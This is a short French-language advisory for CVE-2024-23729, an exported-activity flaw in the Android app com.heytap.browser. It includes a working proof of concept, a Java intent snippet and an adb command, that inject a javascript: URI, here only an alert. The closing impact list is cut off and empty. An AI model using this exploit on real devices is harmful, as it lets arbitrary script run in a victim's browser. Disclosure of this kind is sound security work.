
CVE-2024-23729
Une vulnérabilité a été découverte dans l'application com.heytap.browser sur la plateforme Android. La vulnérabilité permet à un attaquant d'exécuter du code JavaScript arbitraire dans le contexte de l'application sans aucune autorisation.
com.heytap.browserL'activité com.android.browser.RealBrowserActivity dans l'application com.heytap.browser est exportée et peut être invoquée par toute application tierce sans nécessiter d'autorisations. Une application malveillante peut exploiter cela pour exécuter du code JavaScript arbitraire dans le contexte de l'application com.heytap.browser.
{
super.onCreate(savedInstanceState);
String javaScriptCommand = "javascript:alert%28%27Test%20Alert%27%29%3B";
Intent intent = new Intent(Intent.ACTION_VIEW);
intent.setData(Uri.parse(javaScriptCommand));
intent.setClassName("com.heytap.browser", "com.android.browser.RealBrowserActivity");
startActivity(intent);
finish();
}
adb shell am start -a android.intent.action.VIEW -d "javascript:alert%28%27Test%20Alert%27%29%3B" -n com.heytap.browser/com.android.browser.RealBrowserActivity

Une exploitation réussie permet à un attaquant de :
com.heytap.browser.